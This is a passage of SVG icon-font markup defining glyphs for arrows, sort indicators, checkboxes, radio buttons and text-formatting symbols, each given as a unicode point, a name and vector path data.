<glyph unicode="&#xee7e;" glyph-name="arrow-up" d="M512 928l-480-480h288v-512h384v512h288z" />
<glyph unicode="&#xee7f;" glyph-name="arrow-up-right" d="M288 960l256-256-544-544 224-224 544 544 256-255.998v735.998h-736z" />
<glyph unicode="&#xee80;" glyph-name="arrow-right" d="M992 448l-480 480v-288h-512v-384h512v-288z" />
<glyph unicode="&#xee81;" glyph-name="arrow-down-right" d="M1024 672l-256-256-544 544-224-224 544-544-255.998-256h735.998v736z" />
<glyph unicode="&#xee82;" glyph-name="arrow-down" d="M512-32l480 480h-288v512h-384v-512h-288z" />
<glyph unicode="&#xee83;" glyph-name="arrow-down-left" d="M736-64l-256 256 544 544-224 224-544-544-256 255.998v-735.998h736z" />
<glyph unicode="&#xee84;" glyph-name="arrow-left" d="M32 448l480-480v288h512v384h-512v288z" />
<glyph unicode="&#xee85;" glyph-name="arrow-up-left2" d="M877.254 173.254l-530.744 530.746h229.49c35.346 0 64 28.654 64 64s-28.654 64-64 64h-384c-25.886 0-49.222-15.592-59.128-39.508-3.282-7.924-4.84-16.242-4.838-24.492h-0.034v-384c0-35.346 28.654-64 64-64s64 28.654 64 64v229.49l530.746-530.744c12.496-12.498 28.876-18.746 45.254-18.746s32.758 6.248 45.254 18.746c24.994 24.992 24.994 65.516 0 90.508z" />
<glyph unicode="&#xee86;" glyph-name="arrow-up2" d="M877.254 557.254l-320 320c-24.992 24.994-65.514 24.994-90.508 0l-320-320c-24.994-24.994-24.994-65.516 0-90.51 24.994-24.996 65.516-24.996 90.51 0l210.744 210.746v-613.49c0-35.346 28.654-64 64-64s64 28.654 64 64v613.49l210.746-210.746c12.496-12.496 28.876-18.744 45.254-18.744s32.758 6.248 45.254 18.746c24.994 24.994 24.994 65.514 0 90.508z" />
<glyph unicode="&#xee87;" glyph-name="arrow-up-right2" d="M237.254 82.746l530.746 530.744v-229.49c0-35.346 28.654-64 64-64s64 28.654 64 64v384c0 25.884-15.594 49.222-39.508 59.126-7.924 3.284-16.242 4.84-24.492 4.838v0.036h-384c-35.346 0-64-28.654-64-64 0-35.348 28.654-64 64-64h229.49l-530.744-530.746c-12.498-12.496-18.746-28.876-18.746-45.254s6.248-32.758 18.746-45.254c24.992-24.994 65.516-24.994 90.508 0z" />
<glyph unicode="&#xee88;" glyph-name="arrow-right2" d="M621.254 82.746l320 320c24.994 24.992 24.994 65.516 0 90.51l-320 320c-24.994 24.992-65.516 24.992-90.51 0-24.994-24.994-24.994-65.516 0-90.51l210.746-210.746h-613.49c-35.346 0-64-28.654-64-64s28.654-64 64-64h613.49l-210.746-210.746c-12.496-12.496-18.744-28.876-18.744-45.254s6.248-32.758 18.744-45.254c24.994-24.994 65.516-24.994 90.51 0z" />
<glyph unicode="&#xee89;" glyph-name="arrow-down-right2" d="M146.746 722.746l530.742-530.746h-229.488c-35.346 0-64-28.654-64-64s28.654-64 64-64h384c25.884 0 49.222 15.594 59.126 39.508 3.284 7.924 4.84 16.242 4.838 24.492h0.036v384c0 35.346-28.654 64-64 64-35.348 0-64-28.654-64-64v-229.49l-530.746 530.744c-12.496 12.498-28.874 18.746-45.254 18.746s-32.758-6.248-45.254-18.746c-24.994-24.992-24.994-65.516 0-90.508z" />
<glyph unicode="&#xee8a;" glyph-name="arrow-down2" d="M877.254 338.746l-320-320c-24.992-24.994-65.514-24.994-90.508 0l-320 320c-24.994 24.994-24.994 65.516 0 90.51 24.994 24.996 65.516 24.996 90.51 0l210.744-210.746v613.49c0 35.346 28.654 64 64 64s64-28.654 64-64v-613.49l210.746 210.746c12.496 12.496 28.876 18.744 45.254 18.744s32.758-6.248 45.254-18.746c24.994-24.994 24.994-65.514 0-90.508z" />
<glyph unicode="&#xee8b;" glyph-name="arrow-down-left2" d="M786.744 813.256l-530.744-530.744v229.49c0 35.346-28.654 64-64 64s-64-28.654-64-64v-384.002c0-25.886 15.592-49.222 39.508-59.128 7.924-3.282 16.242-4.84 24.492-4.836v-0.036l384 0.002c35.344 0 64 28.654 64 63.998 0 35.348-28.656 64-64 64h-229.49l530.744 530.746c12.496 12.496 18.746 28.876 18.746 45.256 0 16.376-6.25 32.758-18.746 45.254-24.992 24.992-65.518 24.992-90.51 0v0z" />
<glyph unicode="&#xee8c;" glyph-name="arrow-left2" d="M402.746 82.746l-320 320c-24.994 24.992-24.994 65.516 0 90.51l320 320c24.994 24.992 65.516 24.992 90.51 0 24.994-24.994 24.994-65.516 0-90.51l-210.746-210.746h613.49c35.346 0 64-28.654 64-64s-28.654-64-64-64h-613.49l210.746-210.746c12.496-12.496 18.744-28.876 18.744-45.254s-6.248-32.758-18.744-45.254c-24.994-24.994-65.516-24.994-90.51 0z" />
<glyph unicode="&#xee8d;" glyph-name="circle-up" d="M0 448c0-282.77 229.23-512 512-512s512 229.23 512 512-229.23 512-512 512-512-229.23-512-512zM928 448c0-229.75-186.25-416-416-416s-416 186.25-416 416 186.25 416 416 416 416-186.25 416-416zM706.744 290.744l90.512 90.512-285.256 285.254-285.254-285.256 90.508-90.508 194.746 194.744z" />
<glyph unicode="&#xee8e;" glyph-name="circle-right" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM354.744 253.256l90.512-90.512 285.254 285.256-285.256 285.254-90.508-90.508 194.744-194.746z" />
<glyph unicode="&#xee8f;" glyph-name="circle-down" d="M1024 448c0 282.77-229.23 512-512 512s-512-229.23-512-512 229.23-512 512-512 512 229.23 512 512zM96 448c0 229.75 186.25 416 416 416s416-186.25 416-416-186.25-416-416-416-416 186.25-416 416zM317.256 605.256l-90.512-90.512 285.256-285.254 285.254 285.256-90.508 90.508-194.746-194.744z" />
<glyph unicode="&#xee90;" glyph-name="circle-left" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM669.256 642.744l-90.512 90.512-285.254-285.256 285.256-285.254 90.508 90.508-194.744 194.746z" />
<glyph unicode="&#xee91;" glyph-name="tab" d="M960 960h64v-512h-64v512zM0 448h64v-512h-64v512zM320 256h704v-128h-704v-160l-224 224 224 224v-160zM704 640h-704v128h704v160l224-224-224-224z" />
<glyph unicode="&#xee92;" glyph-name="move-up" d="M704 448v-384h64v384h160l-192 192-192-192zM64 768h96v-64h-96v64zM192 768h96v-64h-96v64zM320 768h64v-96h-64v96zM64 544h64v-96h-64v96zM160 512h96v-64h-96v64zM288 512h96v-64h-96v64zM64 672h64v-96h-64v96zM320 640h64v-96h-64v96zM320 256v-192h-192v192h192zM384 320h-320v-320h320v320z" />
<glyph unicode="&#xee93;" glyph-name="move-down" d="M768 256v384h-64v-384h-160l192-192 192 192zM320 704v-192h-192v192h192zM384 768h-320v-320h320v320zM64 320h96v-64h-96v64zM192 320h96v-64h-96v64zM320 320h64v-96h-64v96zM64 96h64v-96h-64v96zM160 64h96v-64h-96v64zM288 64h96v-64h-96v64zM64 224h64v-96h-64v96zM320 192h64v-96h-64v96z" />
<glyph unicode="&#xee94;" glyph-name="sort-alpha-asc" d="M320 192v768h-128v-768h-160l224-224 224 224h-160zM928-64h-256c-11.8 0-22.644 6.496-28.214 16.9-5.566 10.404-4.958 23.030 1.59 32.85l222.832 334.25h-196.208c-17.672 0-32 14.328-32 32s14.328 32 32 32h256c11.8 0 22.644-6.496 28.214-16.9 5.566-10.404 4.958-23.030-1.59-32.85l-222.83-334.25h196.206c17.672 0 32-14.328 32-32s-14.328-32-32-32zM1020.622 558.314l-192.002 384c-5.42 10.842-16.502 17.69-28.622 17.69-12.122 0-23.202-6.848-28.624-17.69l-191.996-384c-7.904-15.806-1.496-35.030 14.31-42.932 4.594-2.296 9.476-3.386 14.288-3.386 11.736 0 23.040 6.484 28.644 17.698l55.156 110.31h216.446l55.156-110.31c7.902-15.806 27.124-22.21 42.932-14.31 15.808 7.902 22.216 27.124 14.312 42.93zM723.778 704.004l76.22 152.446 76.224-152.446h-152.444z" />
<glyph unicode="&#xee95;" glyph-name="sort-alpha-desc" d="M320 192v768h-128v-768h-160l224-224 224 224h-160zM928 512h-256c-11.8 0-22.644 6.496-28.214 16.9-5.566 10.406-4.958 23.030 1.59 32.85l222.832 334.25h-196.208c-17.672 0-32 14.328-32 32s14.328 32 32 32h256c11.8 0 22.644-6.496 28.214-16.9 5.566-10.406 4.958-23.030-1.59-32.85l-222.83-334.25h196.206c17.672 0 32-14.328 32-32s-14.328-32-32-32zM1020.622-17.69l-192.002 384c-5.42 10.842-16.502 17.69-28.622 17.69-12.122 0-23.202-6.848-28.624-17.69l-191.996-384c-7.904-15.806-1.496-35.030 14.31-42.932 4.594-2.296 9.476-3.386 14.288-3.386 11.736 0 23.040 6.484 28.644 17.698l55.158 110.31h216.446l55.156-110.31c7.902-15.806 27.124-22.21 42.932-14.31 15.806 7.902 22.214 27.124 14.31 42.93zM723.778 128l76.22 152.446 76.226-152.446h-152.446z" />
<glyph unicode="&#xee96;" glyph-name="sort-numeric-asc" d="M320 192v768h-128v-768h-160l224-224 224 224h-160zM864 512c-17.674 0-32 14.328-32 32v352h-32c-17.674 0-32 14.328-32 32s14.326 32 32 32h64c17.674 0 32-14.328 32-32v-384c0-17.672-14.326-32-32-32zM928 384h-192c-17.674 0-32-14.326-32-32v-192c0-17.674 14.326-32 32-32h160v-128h-160c-17.674 0-32-14.326-32-32s14.326-32 32-32h192c17.674 0 32 14.326 32 32v384c0 17.674-14.326 32-32 32zM768 320h128v-128h-128v128z" />
<glyph unicode="&#xee97;" glyph-name="sort-numberic-desc" d="M320 192v768h-128v-768h-160l224-224 224 224h-160zM864-64c-17.674 0-32 14.328-32 32v352h-32c-17.674 0-32 14.328-32 32s14.326 32 32 32h64c17.674 0 32-14.328 32-32v-384c0-17.672-14.326-32-32-32zM928 960h-192c-17.674 0-32-14.326-32-32v-192c0-17.674 14.326-32 32-32h160v-128h-160c-17.674 0-32-14.326-32-32s14.326-32 32-32h192c17.674 0 32 14.326 32 32v384c0 17.674-14.326 32-32 32zM768 896h128v-128h-128v128z" />
<glyph unicode="&#xee98;" glyph-name="sort-amount-asc" d="M320 192v768h-128v-768h-160l224-224 224 224h-160zM448 384h576v-128h-576v128zM448 576h448v-128h-448v128zM448 768h320v-128h-320v128zM448 960h192v-128h-192v128z" />
<glyph unicode="&#xee99;" glyph-name="sort-amount-desc" d="M320 192v768h-128v-768h-160l224-224 224 224h-160zM448 960h576v-128h-576v128zM448 768h448v-128h-448v128zM448 576h320v-128h-320v128zM448 384h192v-128h-192v128z" />
<glyph unicode="&#xee9a;" glyph-name="command" d="M736 64c-88.224 0-160 71.776-160 160v96h-128v-96c0-88.224-71.776-160-160-160s-160 71.776-160 160 71.776 160 160 160h96v128h-96c-88.224 0-160 71.776-160 160s71.776 160 160 160 160-71.776 160-160v-96h128v96c0 88.224 71.776 160 160 160s160-71.776 160-160-71.776-160-160-160h-96v-128h96c88.224 0 160-71.776 160-160s-71.774-160-160-160zM640 320v-96c0-52.934 43.066-96 96-96s96 43.066 96 96-43.066 96-96 96h-96zM288 320c-52.934 0-96-43.066-96-96s43.066-96 96-96 96 43.066 96 96v96h-96zM448 384h128v128h-128v-128zM640 576h96c52.934 0 96 43.066 96 96s-43.066 96-96 96-96-43.066-96-96v-96zM288 768c-52.934 0-96-43.066-96-96s43.066-96 96-96h96v96c0 52.934-43.064 96-96 96z" />
<glyph unicode="&#xee9b;" glyph-name="shift" d="M672 64h-320c-17.672 0-32 14.326-32 32v352h-128c-12.942 0-24.612 7.796-29.564 19.754-4.954 11.958-2.214 25.722 6.936 34.874l320 320c12.498 12.496 32.758 12.496 45.254 0l320-320c9.152-9.152 11.89-22.916 6.938-34.874s-16.62-19.754-29.564-19.754h-128v-352c0-17.674-14.326-32-32-32zM384 128h256v352c0 17.672 14.326 32 32 32h82.744l-242.744 242.746-242.744-242.746h82.744c17.672 0 32-14.328 32-32v-352z" />
<glyph unicode="&#xee9c;" glyph-name="ctrl" d="M736.014 512c-8.908 0-17.77 3.698-24.096 10.928l-199.918 228.478-199.918-228.478c-11.636-13.3-31.856-14.65-45.154-3.010-13.3 11.638-14.648 31.854-3.010 45.154l224 256c6.076 6.944 14.854 10.928 24.082 10.928s18.006-3.984 24.082-10.928l224-256c11.638-13.3 10.292-33.516-3.010-45.154-6.070-5.312-13.582-7.918-21.058-7.918z" />
<glyph unicode="&#xee9d;" glyph-name="opt" d="M928 128h-256c-12.646 0-24.106 7.448-29.242 19.004l-247.554 556.996h-299.204c-17.672 0-32 14.328-32 32s14.328 32 32 32h320c12.646 0 24.106-7.448 29.242-19.004l247.556-556.996h235.202c17.674 0 32-14.326 32-32s-14.326-32-32-32zM928 704h-320c-17.674 0-32 14.328-32 32s14.326 32 32 32h320c17.674 0 32-14.328 32-32s-14.326-32-32-32z" />
<glyph unicode="&#xee9e;" glyph-name="checkbox-checked" d="M896 960h-768c-70.4 0-128-57.6-128-128v-768c0-70.4 57.6-128 128-128h768c70.4 0 128 57.6 128 128v768c0 70.4-57.6 128-128 128zM448 165.49l-237.254 237.256 90.51 90.508 146.744-146.744 306.746 306.746 90.508-90.51-397.254-397.256z" />
<glyph unicode="&#xee9f;" glyph-name="checkbox-unchecked" d="M896 960h-768c-70.4 0-128-57.6-128-128v-768c0-70.4 57.6-128 128-128h768c70.4 0 128 57.6 128 128v768c0 70.4-57.6 128-128 128zM896 64h-768v768h768v-768z" />
<glyph unicode="&#xeea0;" glyph-name="radio-checked" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 64c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.078 0 384-171.922 384-384s-171.922-384-384-384zM320 448c0 106.039 85.961 192 192 192s192-85.961 192-192c0-106.039-85.961-192-192-192s-192 85.961-192 192z" />
<glyph unicode="&#xeea1;" glyph-name="radio-checked2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 320c-70.692 0-128 57.306-128 128 0 70.692 57.308 128 128 128 70.694 0 128-57.308 128-128 0-70.694-57.306-128-128-128z" />
<glyph unicode="&#xeea2;" glyph-name="radio-unchecked" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 64c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.078 0 384-171.922 384-384s-171.922-384-384-384z" />
<glyph unicode="&#xeea3;" glyph-name="crop" d="M832 704l192 192-64 64-192-192h-448v192h-128v-192h-192v-128h192v-512h512v-192h128v192h192v128h-192v448zM320 640h320l-320-320v320zM384 256l320 320v-320h-320z" />
<glyph unicode="&#xeea4;" glyph-name="make-group" d="M320 832h-128c-35.2 0-64-28.8-64-64v-128c0-35.2 28.8-64 64-64h128c35.2 0 64 28.8 64 64v128c0 35.2-28.8 64-64 64zM704 576h128c35.2 0 64 28.8 64 64v128c0 35.2-28.8 64-64 64h-128c-35.2 0-64-28.8-64-64v-128c0-35.2 28.8-64 64-64zM704 768h128v-128h-128v128zM320 320h-128c-35.2 0-64-28.8-64-64v-128c0-35.2 28.8-64 64-64h128c35.2 0 64 28.8 64 64v128c0 35.2-28.8 64-64 64zM320 128h-128v128h128v-128zM832 320h-128c-35.2 0-64-28.8-64-64v-128c0-35.2 28.8-64 64-64h128c35.2 0 64 28.8 64 64v128c0 35.2-28.8 64-64 64zM896 448h-64c-85.476 0-165.834 33.286-226.274 93.724-60.44 60.442-93.726 140.802-93.726 226.276v64c0 70.4-57.6 128-128 128h-256c-70.4 0-128-57.6-128-128v-256c0-70.4 57.6-128 128-128h64c85.476 0 165.834-33.286 226.274-93.724 60.44-60.442 93.726-140.802 93.726-226.276v-64c0-70.4 57.6-128 128-128h256c70.4 0 128 57.6 128 128v256c0 70.4-57.6 128-128 128zM960 64c0-16.954-6.696-32.986-18.856-45.144-12.158-12.16-28.19-18.856-45.144-18.856h-256c-16.954 0-32.986 6.696-45.144 18.856-12.16 12.158-18.856 28.19-18.856 45.144v64c0 212.078-171.922 384-384 384h-64c-16.954 0-32.986 6.696-45.146 18.854-12.158 12.16-18.854 28.192-18.854 45.146v256c0 16.954 6.696 32.986 18.854 45.146 12.16 12.158 28.192 18.854 45.146 18.854h256c16.954 0 32.986-6.696 45.146-18.854 12.158-12.16 18.854-28.192 18.854-45.146v-64c0-212.078 171.922-384 384-384h64c16.954 0 32.986-6.696 45.144-18.856 12.16-12.158 18.856-28.19 18.856-45.144v-256z" />
<glyph unicode="&#xeea5;" glyph-name="ungroup" d="M384 496c0-26.4-21.6-48-48-48h-96c-26.4 0-48 21.6-48 48v96c0 26.4 21.6 48 48 48h96c26.4 0 48-21.6 48-48v-96zM704 496c0-26.4-21.6-48-48-48h-96c-26.4 0-48 21.6-48 48v96c0 26.4 21.6 48 48 48h96c26.4 0 48-21.6 48-48v-96zM384 176c0-26.4-21.6-48-48-48h-96c-26.4 0-48 21.6-48 48v96c0 26.4 21.6 48 48 48h96c26.4 0 48-21.6 48-48v-96zM704 176c0-26.4-21.6-48-48-48h-96c-26.4 0-48 21.6-48 48v96c0 26.4 21.6 48 48 48h96c26.4 0 48-21.6 48-48v-96zM912.082 800l111.918 111.916v48.084h-48.082l-111.918-111.916-111.918 111.916h-48.082v-48.084l111.918-111.916-111.918-111.916v-48.084h48.082l111.918 111.916 111.918-111.916h48.082v48.084zM0 192h64v-128h-64v128zM0 384h64v-128h-64v128zM832 512h64v-128h-64v128zM832 128h64v-128h-64v128zM832 320h64v-128h-64v128zM0 576h64v-128h-64v128zM0 768h64v-128h-64v128zM512 832h128v-64h-128v64zM320 832h128v-64h-128v64zM128 832h128v-64h-128v64zM448 0h128v-64h-128v64zM640 0h128v-64h-128v64zM256 0h128v-64h-128v64zM64 0h128v-64h-128v64z" />
<glyph unicode="&#xeea6;" glyph-name="scissors" d="M913.826 280.306c-66.684 104.204-181.078 150.064-255.51 102.434-6.428-4.116-12.334-8.804-17.744-13.982l-79.452 124.262 183.462 287.972c15.016 27.73 20.558 60.758 13.266 93.974-6.972 31.75-24.516 58.438-48.102 77.226l-12.278 7.808-217.468-340.114-217.47 340.114-12.276-7.806c-23.586-18.79-41.13-45.476-48.1-77.226-7.292-33.216-1.75-66.244 13.264-93.974l183.464-287.972-79.454-124.262c-5.41 5.178-11.316 9.868-17.744 13.982-74.432 47.63-188.826 1.77-255.51-102.434-66.68-104.2-60.398-227.286 14.032-274.914 74.43-47.632 188.824-1.77 255.508 102.432l164.286 257.87 164.288-257.872c66.684-104.202 181.078-150.064 255.508-102.432 74.428 47.63 80.71 170.716 14.030 274.914zM234.852 159.57c-30.018-46.904-68.534-69.726-94.572-75.446-0.004 0-0.004 0-0.004 0-8.49-1.868-20.294-3.010-28.324 2.128-8.898 5.694-14.804 20.748-15.8 40.276-1.616 31.644 9.642 68.836 30.888 102.034 30.014 46.906 68.53 69.726 94.562 75.444 8.496 1.866 20.308 3.010 28.336-2.126 8.898-5.694 14.802-20.75 15.798-40.272 1.618-31.65-9.64-68.84-30.884-102.038zM480 448c-17.672 0-32 14.328-32 32s14.328 32 32 32 32-14.328 32-32-14.328-32-32-32zM863.85 126.53c-0.996-19.528-6.902-34.582-15.8-40.276-8.030-5.138-19.834-3.996-28.324-2.128 0 0 0 0-0.004 0-26.040 5.718-64.554 28.542-94.572 75.446-21.244 33.198-32.502 70.388-30.884 102.038 0.996 19.522 6.9 34.578 15.798 40.272 8.028 5.136 19.84 3.992 28.336 2.126 26.034-5.716 64.548-28.538 94.562-75.444 21.246-33.198 32.502-70.39 30.888-102.034z" />
<glyph unicode="&#xeea7;" glyph-name="filter" d="M512 960c-282.77 0-512-71.634-512-160v-96l384-384v-320c0-35.346 57.306-64 128-64 70.692 0 128 28.654 128 64v320l384 384v96c0 88.366-229.23 160-512 160zM94.384 821.176c23.944 13.658 57.582 26.62 97.278 37.488 87.944 24.076 201.708 37.336 320.338 37.336 118.628 0 232.394-13.26 320.338-37.336 39.696-10.868 73.334-23.83 97.28-37.488 15.792-9.006 24.324-16.624 28.296-21.176-3.972-4.552-12.506-12.168-28.296-21.176-23.946-13.658-57.584-26.62-97.28-37.488-87.942-24.076-201.708-37.336-320.338-37.336s-232.394 13.26-320.338 37.336c-39.696 10.868-73.334 23.83-97.278 37.488-15.792 9.008-24.324 16.624-28.298 21.176 3.974 4.552 12.506 12.168 28.298 21.176z" />
<glyph unicode="&#xeea8;" glyph-name="font" d="M799.596 943.792c-90.526 0-148.62 16.208-241.848 16.208-301.284 0-441.792-171.584-441.792-345.872 0-102.678 48.64-136.458 144.564-136.458-6.758 14.864-18.914 31.080-18.914 104.034 0 204.010 77.006 263.458 175.636 267.51 0 0-80.918-793.374-315.778-888.542v-24.672h316.594l108.026 512h197.844l44.072 128h-214.908l51.944 246.19c59.446-12.156 117.542-24.316 167.532-24.316 62.148 0 118.894 18.914 149.968 162.126-37.826-12.16-78.362-16.208-122.94-16.208z" />
<glyph unicode="&#xeea9;" glyph-name="ligature" d="M768 88.178c0 0.040 0.002 0.076 0.002 0.116l-0.344 436.562-127.492-6.19h-251.93v21.494c0 81.542 5.8 162.976 17.24 194.716 7.896 21.948 22.598 41.744 43.698 58.836 20.618 16.702 41.178 25.17 61.11 25.17 16.772 0 30.702-2.878 41.402-8.554 15.026-8.562 29.716-22.964 43.67-42.818 36.95-52.504 51.99-66.454 60.094-72.376 13.804-10.094 30.512-15.212 49.658-15.212 18.668 0 34.962 6.97 48.436 20.714 13.372 13.636 20.15 30.682 20.15 50.666 0 21.452-8.916 44.204-26.502 67.622-17.184 22.888-43.708 41.742-78.834 56.032-34.322 13.964-72.94 21.044-114.778 21.044-60.716 0-116.012-14.596-164.356-43.384-48.424-28.834-85.558-68.952-110.37-119.24-22.994-46.604-21.334-134.706-22.732-214.712h-125.732v-71.402h125.598v-324.668c0-71.666-21.906-91.008-30.216-101.324-11.436-14.202-32.552-29.104-60.444-29.104h-38.654v-56.166h385.326v56.168h-6.708c-91.144 0-117.020 9.832-117.020 120.842 0 0.018 0 0.034 0 0.048l-0.038 334.206h140.204c74.404 0 91.496-3.444 95.392-4.924 4.706-1.79 10.798-4.832 13.084-9.144 0.868-1.684 5.194-25.008 5.194-82.972v-250.67c0-58.454-7.124-77.896-11.45-84.402-9.248-14.194-20.41-22.066-54.66-22.904v-56.248h293.61v55.846c-91.608 0-101.608 9.82-101.608 96.332z" />
<glyph unicode="&#xeeaa;" glyph-name="ligature2" d="M855.328 42.546c-11.734 0-83.62 13.2-88.020 29.338-10.274 39.612-11.738 82.152-11.738 130.568v540.974c0 80.686 16.138 127.632 16.138 127.632-1.468 7.334-8.804 23.472-17.604 23.472h-4.404c-4.4 0-55.746-32.276-102.692-32.276-38.14 0.002-61.89 33.746-105.902 33.746-185.106 0-271.942-150.31-271.942-363.032v-11.072c0-4.402-2.934-8.804-7.336-8.804h-60.148c-7.336 0-22.006-41.078-22.006-60.148 0-5.87 1.466-8.8 4.4-8.8h77.754c4.402 0 7.336-5.872 7.336-10.27 0-130.566-1.466-259.298-1.466-259.298 0-20.54-1.466-66.016-10.27-102.692-4.4-16.138-71.884-29.338-89.488-29.338-7.334 0-7.334-35.212 0-42.546 60.148 2.934 99.758 7.334 159.908 7.334 55.75 0 98.292-4.4 156.974-7.334 2.934 8.802 2.934 42.546-4.4 42.546-11.736 0-83.624 13.2-88.022 29.338-10.27 39.612-10.27 82.152-11.738 130.568v232.888c0 4.402 4.402 8.804 8.802 8.804h151.104c10.27 20.538 17.606 45.476 17.606 58.68 0 8.802 0 10.27-7.336 10.27h-162.84c-2.934 0-7.336 4.402-7.336 7.334v52.82c0 130.568 53.482 245.538 142.97 245.538 63.372 0 118.666-41.060 118.666-197.922 0-0.006 0-0.012 0-0.018 0.208-4.036 0.314-7.294 0.314-9.452v-436.816c0-20.54-1.47-66.016-10.27-102.692-4.404-16.138-71.884-29.338-89.492-29.338-7.336 0-7.336-35.212 0-42.546 60.15 2.934 99.762 7.334 159.912 7.334 55.746 0 98.288-4.4 156.972-7.334 2.928 8.8 2.928 42.544-4.406 42.544z" />
<glyph unicode="&#xeeab;" glyph-name="text-height" d="M896 192h128l-160-192-160 192h128v512h-128l160 192 160-192h-128zM640 896v-256l-64 128h-192v-704h128v-64h-384v64h128v704h-192l-64-128v256z" />
<glyph unicode="&#xeeac;" glyph-name="text-width" d="M256 64v-128l-192 160 192 160v-128h512v128l192-160-192-160v128zM832 896v-256l-64 128h-192v-448h128v-64h-384v64h128v448h-192l-64-128v256z" />
<glyph unicode="&#xeead;" glyph-name="font-size" d="M64 448h384v-128h-128v-384h-128v384h-128zM960 704h-251.75v-768h-136.5v768h-251.75v128h640z" />
<glyph unicode="&#xeeae;" glyph-name="bold" d="M707.88 475.348c37.498 44.542 60.12 102.008 60.12 164.652 0 141.16-114.842 256-256 256h-320v-896h384c141.158 0 256 114.842 256 256 0 92.956-49.798 174.496-124.12 219.348zM384 768h101.5c55.968 0 101.5-57.42 101.5-128s-45.532-128-101.5-128h-101.5v256zM543 128h-159v256h159c58.45 0 106-57.42 106-128s-47.55-128-106-128z" />
<glyph unicode="&#xeeaf;" glyph-name="underline" d="M704 896h128v-416c0-159.058-143.268-288-320-288-176.73 0-320 128.942-320 288v416h128v-416c0-40.166 18.238-78.704 51.354-108.506 36.896-33.204 86.846-51.494 140.646-51.494s103.75 18.29 140.646 51.494c33.116 29.802 51.354 68.34 51.354 108.506v416zM192 128h640v-128h-640z" />
<glyph unicode="&#xeeb0;" glyph-name="italic" d="M896 896v-64h-128l-320-768h128v-64h-448v64h128l320 768h-128v64z" />
<glyph unicode="&#xeeb1;" glyph-name="strikethrough" d="M1024 448v-64h-234.506c27.504-38.51 42.506-82.692 42.506-128 0-70.878-36.66-139.026-100.58-186.964-59.358-44.518-137.284-69.036-219.42-69.036-82.138 0-160.062 24.518-219.42 69.036-63.92 47.938-100.58 116.086-100.58 186.964h128c0-69.382 87.926-128 192-128s192 58.618 192 128c0 69.382-87.926 128-192 128h-512v64h299.518c-2.338 1.654-4.656 3.324-6.938 5.036-63.92 47.94-100.58 116.086-100.58 186.964s36.66 139.024 100.58 186.964c59.358 44.518 137.282 69.036 219.42 69.036 82.136 0 160.062-24.518 219.42-69.036 63.92-47.94 100.58-116.086 100.58-186.964h-128c0 69.382-87.926 128-192 128s-192-58.618-192-128c0-69.382 87.926-128 192-128 78.978 0 154.054-22.678 212.482-64h299.518z" />
<glyph unicode="&#xeeb2;" glyph-name="omega" d="M704 64h256l64 128v-256h-384v214.214c131.112 56.484 224 197.162 224 361.786 0 214.432-157.598 382.266-352 382.266-194.406 0-352-167.832-352-382.266 0-164.624 92.886-305.302 224-361.786v-214.214h-384v256l64-128h256v32.59c-187.63 66.46-320 227.402-320 415.41 0 247.424 229.23 448 512 448s512-200.576 512-448c0-188.008-132.37-348.95-320-415.41v-32.59z" />
<glyph unicode="&#xeeb3;" glyph-name="sigma" d="M941.606 225.292l44.394 94.708h38l-64-384h-960v74.242l331.546 391.212-331.546 331.546v227h980l44-256h-34.376l-18.72 38.88c-35.318 73.364-61.904 89.12-138.904 89.12h-662l353.056-353.056-297.42-350.944h542.364c116.008 0 146.648 41.578 173.606 97.292z" />
<glyph unicode="&#xeeb4;" glyph-name="page-break" d="M0 448h128v-64h-128zM192 448h192v-64h-192zM448 448h128v-64h-128zM640 448h192v-64h-192zM896 448h128v-64h-128zM880 960l16-448h-768l16 448h32l16-384h640l16 384zM144-64l-16 384h768l-16-384h-32l-16 320h-640l-16-320z" />
<glyph unicode="&#xeeb5;" glyph-name="superscript" d="M768 754v-50h128v-64h-192v146l128 60v50h-128v64h192v-146zM676 704h-136l-188-188-188 188h-136l256-256-256-256h136l188 188 188-188h136l-256 256z" />
<glyph unicode="&#xeeb6;" glyph-name="subscript" d="M768 50v-50h128v-64h-192v146l128 60v50h-128v64h192v-146zM676 704h-136l-188-188-188 188h-136l256-256-256-256h136l188 188 188-188h136l-256 256z" />
<glyph unicode="&#xeeb7;" glyph-name="superscript2" d="M194.018 128l57.6 192h264.764l57.6-192h113.632l-192 640h-223.232l-192-640h113.636zM347.618 640h72.764l57.6-192h-187.964l57.6 192zM704 128l160 256 160-256h-320zM864 832h-64c-17.644 0-32 14.356-32 32s14.356 32 32 32h128c17.674 0 32 14.328 32 32s-14.326 32-32 32h-128c-52.936 0-96-43.066-96-96 0-24.568 9.288-47.002 24.524-64 17.588-19.624 43.11-32 71.476-32h64c17.644 0 32-14.356 32-32s-14.356-32-32-32h-128c-17.674 0-32-14.328-32-32s14.326-32 32-32h128c52.936 0 96 43.066 96 96 0 24.568-9.288 47.002-24.524 64-17.588 19.624-43.108 32-71.476 32z" />
<glyph unicode="&#xeeb8;" glyph-name="subscript2" d="M194.018 128l57.6 192h264.764l57.6-192h113.632l-192 640h-223.232l-192-640h113.636zM347.618 640h72.764l57.6-192h-187.964l57.6 192zM1024 768l-160-256-160 256h320zM864 128h-64c-17.644 0-32 14.356-32 32s14.356 32 32 32h128c17.674 0 32 14.328 32 32s-14.326 32-32 32h-128c-52.936 0-96-43.066-96-96 0-24.568 9.29-47.002 24.524-64 17.588-19.624 43.112-32 71.476-32h64c17.644 0 32-14.356 32-32s-14.356-32-32-32h-128c-17.674 0-32-14.328-32-32s14.326-32 32-32h128c52.936 0 96 43.066 96 96 0 24.568-9.29 47.002-24.524 64-17.588 19.624-43.108 32-71.476 32z" />
